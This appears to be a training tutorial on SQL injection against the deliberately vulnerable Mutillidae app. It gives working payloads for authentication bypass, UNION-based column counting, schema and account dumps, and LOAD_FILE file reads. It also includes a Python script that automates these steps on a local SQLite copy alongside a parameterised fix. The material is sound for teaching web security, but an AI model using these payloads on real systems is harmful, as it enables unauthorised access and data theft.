A1: SQL Injection Mutillidae Tutorial Manual

Ok Guys, we are on our first module: A1: SQL Injection.

If you turn on the hints, the page shows a bubble tip like the one below and asks you to insert a single quote to test for any error the web application produces.

So if you put in a single quote, you get the following error.

The important thing here is the error line.

Findings

/var/www/html/mutillidae/classes/MySQLHandler.php on line 224: Error executing query:

1. "File": we can see the full path of the file that is handling this error. More can be inferred from it: a path under /var/www/html means the server is more than likely running on Linux.

error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 2

2. "Message": this tells us the database is MySQL or MariaDB. Why is this important? The backend database determines the syntax, comment style and metadata tables available to us through the application, so every payload from here on is written for MySQL/MariaDB.

Let's expand on our "'" with "' or 1=1 -- " (note the space after the two hyphens; MySQL only treats -- as the start of a comment when it is followed by a space or other whitespace).

Result

So what happened here? You have dumped the entire accounts table. How is that possible?

Look at the error from the single-quote test:

) Query: SELECT * FROM accounts WHERE username=''' AND password='abc' (0) [Exception]

Now we have inserted "' or 1=1 -- ".

This changes the query to

) Query: SELECT * FROM accounts WHERE username='' or 1=1 -- 

Remember that "-- " starts a comment, so everything after it (here the remaining ' AND password='abc') is ignored. Since 1=1 is always true, the WHERE clause matches every row, and we get all the usernames returned.

More exploits to try

admin' --  (remember the space after the hyphens). This keeps only the admin row and comments out the password check, so no password is needed.

UNION

The UNION operator is used in SQL injection to join a query, purposely forged by the tester, to the original query. The result of the forged query is appended to the result of the original query, allowing the tester to read values from columns of other tables.

To get the database version, let's try "admin' UNION SELECT @@version -- ".

We get an error stating "error: The used SELECT statements have a different number of columns". A UNION only works when both SELECTs return the same number of columns, so first we need to find out how many columns the original query selects.

There are basically two ways to find how many columns the original query selects. The first is to inject an ORDER BY clause that refers to a column by number. If the number is greater than the number of columns in the SELECT statement, the database returns an error (in MySQL: Unknown column 'N' in 'order clause'); otherwise the results are simply sorted by that column. Let's see both cases.

admin' order by 2 --  (space after the hyphens)

This runs without an error, so the query selects at least 2 columns.

Now let's try 3. It gives an error like the one below.

Taken at face value, that would mean the query has only 2 columns. Be careful, though: the ORDER BY test is only conclusive if the error is the database's own out-of-range error ("Unknown column '3' in 'order clause'" in MySQL), and the UNION SELECT NULL probe in the next section only succeeds with seven NULLs. When the two techniques disagree, read the exact error text and trust the result that matches the database's own message.

Starting from the known minimum, the procedure is the same either way: increment the column number until an error related to the ORDER BY clause is returned; the last number that worked is the column count.

2nd way

Let's try to learn the number of columns another way, with "admin' UNION SELECT NULL -- ".

When we run this we get the same error about the number of columns. So let's build on it to find the correct number of NULLs we need here.

Note that we are padding with NULL values. NULL is used because it is valid in every column type, and the two queries must have an equal number of columns or the database rejects the UNION.

  • Next try ...
  • "admin' UNION SELECT NULL -- "
  • ... and then
  • "admin' UNION SELECT NULL,NULL -- "
  • ... and then
  • "admin' UNION SELECT NULL,NULL,NULL -- "
  • ... and then
  • "admin' UNION SELECT NULL,NULL,NULL,NULL -- "
  • ... and then
  • "admin' UNION SELECT NULL,NULL,NULL,NULL,NULL -- "
  • ... and then
  • "admin' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL -- "
  • ... and then finally
  • "admin' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL -- "

The seventh attempt runs without the column-count error, so the original query selects seven columns. Because the UNION operator can only be used if both queries have the same structure, the attacker must craft a SELECT statement similar to the original query: the number of columns and their data types have to match, and a valid table name must be known to pull data from elsewhere.

Find Table Names in MySQL

In MySQL, the table information_schema.tables contains the metadata for every table the current database user can see. The most useful columns are listed below.

table_name: the name of the table.

table_schema: the schema (database) in which the table was created.

Here is the general form of a UNION attack that extracts this information. Note that it selects three columns, so it only works against an original query with three columns; against the seven-column query on this page it has to be padded with NULLs, as done below.

admin' AND 1=2 UNION SELECT table_schema, table_name, 1 FROM information_schema.tables -- 

Let's look at each column to determine which ones accept our strings, or at least which ones are displayed as "username", "password" and "signature". To figure this out, let's put a distinct string in each NULL position.

"admin' UNION SELECT 'Column-1','Column-2','Column-3','Column-4','Column-5','Column-6','Column-7' -- "

From the output we see that columns 2, 3 and 4 are the ones rendered on the page, so those are where we place the data we want to read. Let's revisit the attempt to get the database version, replacing the "Column-X" strings with NULLs.

"admin' UNION SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL -- "

Good progress so far. We have now managed to obtain the database version.

Let's continue! How about we dump the database schema, so we can see the list of tables with their column names.

"admin' UNION SELECT NULL,table_name,column_name,NULL,NULL,NULL,NULL FROM information_schema.columns -- "

Now that we have a dump of the database structure (note: the image above is a snapshot), we can look at the other tables to see where we may be able to extract data of relevance.

Going through the list we see the "accounts" table. This is the table that holds the user information we obtained at the beginning of the test. Let's dump the columns of "accounts" to learn more about it.

"admin' UNION SELECT NULL,table_name,column_name,data_type,NULL,NULL,NULL FROM information_schema.columns WHERE table_name = 'accounts' -- "

We see there are additional fields such as "cid", "is_admin", "firstname" and "lastname" (note: the image above is a snapshot).

Let's see what we can learn about "is_admin".

"' UNION SELECT NULL,cid,username,is_admin,NULL,NULL,NULL FROM accounts -- "

Looks like the value for "is_admin" is either "TRUE" or "FALSE". From this we have a list of the admin users in the database.
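To make the three steps above concrete (the "' or 1=1 -- " bypass, the ORDER BY and UNION SELECT NULL column counting, and the UNION dump of accounts), here is an added Python example; it is not part of this tutorial and not Mutillidae's code. It rebuilds the injectable pattern locally against an in-memory SQLite database: the accounts table has the seven columns the NULL probe found, named after the fields listed in this walkthrough (the "signature" column name and every row value are constructed for the example), the query string is assembled by concatenation exactly like the vulnerable page, and a parameterised version sits beside it for comparison. Two assumptions about the stand-in: SQLite has no information_schema, so sqlite_master takes its place, and its ORDER BY out-of-range error text differs from MySQL's, which is why the probe only checks whether an error occurred.

```python
import sqlite3

# Constructed schema: seven columns, matching the seven NULLs the UNION probe
# needed. Column names follow the fields named in the walkthrough; 'signature'
# and every row value are made up for this example, not Mutillidae's data.
SCHEMA = """
CREATE TABLE accounts (
    cid INTEGER PRIMARY KEY, username TEXT, password TEXT, signature TEXT,
    is_admin TEXT, firstname TEXT, lastname TEXT
);
INSERT INTO accounts VALUES (1, 'admin',  'adminpass',  'sig-a', 'TRUE',  'Ann',  'Admin');
INSERT INTO accounts VALUES (2, 'adrian', 'adrianpass', 'sig-b', 'TRUE',  'Ade',  'Crew');
INSERT INTO accounts VALUES (3, 'john',   'johnpass',   'sig-c', 'FALSE', 'John', 'User');
"""


def build_db() -> sqlite3.Connection:
    """Fresh in-memory database loaded with the constructed accounts table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, username, password):
    """The injectable pattern: user input is pasted straight into the SQL text,
    so a quote in `username` ends the literal and the rest is parsed as SQL."""
    query = ("SELECT * FROM accounts WHERE username='" + username
             + "' AND password='" + password + "'")
    return conn.execute(query).fetchall()


def safe_lookup(conn, username, password):
    """Hardened form: bound parameters keep the input as data, never as SQL."""
    query = "SELECT * FROM accounts WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchall()


def probe_error(conn, payload):
    """Tester's oracle: None if the injected query runs, else the error text."""
    try:
        vulnerable_lookup(conn, payload, "abc")
        return None
    except sqlite3.Error as exc:
        return str(exc)


def count_columns_order_by(conn, max_cols=20):
    """Increase ORDER BY n until the database rejects the column index; the
    last n that worked is the column count (SQLite says 'out of range',
    MySQL says Unknown column 'n' in 'order clause')."""
    for n in range(1, max_cols + 1):
        if probe_error(conn, f"admin' ORDER BY {n} -- ") is not None:
            return n - 1
    raise RuntimeError("no ORDER BY error within limit")


def count_columns_union_null(conn, max_cols=20):
    """Add one NULL per attempt until the column-count mismatch error goes away."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        if probe_error(conn, f"admin' UNION SELECT {nulls} -- ") is None:
            return n
    raise RuntimeError("no matching column count within limit")


def dump_tables(conn):
    """Schema dump through the UNION; sqlite_master stands in for information_schema."""
    rows = vulnerable_lookup(
        conn, "' UNION SELECT NULL,name,sql,NULL,NULL,NULL,NULL FROM sqlite_master -- ", "abc")
    return sorted(r[1] for r in rows)


def dump_admins(conn):
    """The is_admin payload from the walkthrough; the smuggled values come back in
    the displayed positions 2, 3 and 4 of each row (cid is read back as text,
    just as the page would render it)."""
    rows = vulnerable_lookup(
        conn, "' UNION SELECT NULL,cid,username,is_admin,NULL,NULL,NULL FROM accounts -- ", "abc")
    return sorted((str(r[1]), r[2], r[3]) for r in rows)


if __name__ == "__main__":
    db = build_db()
    print("single quote error:", probe_error(db, "'"))
    print("' or 1=1 --  rows:", len(vulnerable_lookup(db, "' or 1=1 -- ", "abc")))
    print("same input, parameterised:", safe_lookup(db, "' or 1=1 -- ", "abc"))
    print("columns via ORDER BY:", count_columns_order_by(db))
    print("columns via UNION NULL:", count_columns_union_null(db))
    print("tables:", dump_tables(db))
    print("cid/username/is_admin:", dump_admins(db))
```

Running it shows the same progression as the walkthrough: the lone quote produces a syntax error, the "or 1=1" payload returns every row from the concatenated query and nothing from the parameterised one, both probes settle on seven columns, and the final UNION reads cid, username and is_admin out through the three positions the page displays.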

Let's take a look at which database user the application connects as.

"admin' UNION SELECT NULL,current_user(),NULL,NULL,NULL,NULL,NULL -- "

Very interesting! The application connects to the database as root, so the injected queries run with every privilege root has, which normally includes the FILE privilege needed for the next step.

... and what database are we connected to?

"admin' UNION SELECT NULL,database(),NULL,NULL,NULL,NULL,NULL -- "

Let's now try to read a file from the server's filesystem. LOAD_FILE() returns the file contents only if the database user has the FILE privilege, the file is readable by the database server process, and secure_file_priv does not restrict the location; otherwise it returns NULL rather than an error, so an empty result does not mean the injection failed.

"admin' UNION SELECT NULL,LOAD_FILE('..\\..\\..\\..\\WINDOWS\\system32\\drivers\\etc\\hosts'),NULL,NULL,NULL,NULL,NULL -- "

As we can see we managed to load the contents of the "WINDOWS\\system32\\drivers\\etc\\hosts" file. Note that this payload only works on a Windows host; the file path in the error at the start of this page (/var/www/html/...) points to a Linux install, where the Windows path returns NULL and the equivalent target would be /etc/hosts.
